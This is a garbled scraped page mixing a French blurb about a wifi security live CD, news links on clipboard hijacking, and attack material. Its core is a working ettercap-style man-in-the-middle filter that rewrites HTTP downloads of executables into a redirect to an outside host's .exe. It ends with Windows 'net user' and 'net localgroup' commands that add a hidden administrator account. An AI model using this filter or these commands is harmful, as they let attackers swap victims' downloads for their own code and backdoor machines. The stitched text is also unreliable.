Voici un live cd avec tous les outils pour l'analyse et securité de reseau wifi
2 Months of TabGuard
Il y a 1 an
# replace rmccurdy with your website
# replace the url with what ever exe you like
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
# enable for logging log(DECODED.data, "/tmp/log.log");
msg("found EXE\n");
# "Win32" is the first part of the exe example:
# if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently
Location: http://www.rmccurdy.com/scripts/quickclean.exe
");
msg("redirect success\n");
}
}
http://www.trustedsource.org/blog/145/Rogue-Flash-ads-hijack-your-clipboard
http://news.bbc.co.uk/2/hi/technology/7567889.stm
http://www.theregister.co.uk/2008/08/15/webbased_clipboard_hijacking/
http://blogs.pcmag.com/securitywatch/2008/08/mac_users_get_clipboardjacked.php
http://blogs.zdnet.com/security/?p=1733
http://www.scmagazineus.com/Clipboards-hijacked-by-furtive-code/article/115503
http://www.sophos.com/security/blog/2008/08/1671.html?_log_from=rss
net user name password /add
net localgroup Administrateurs name /add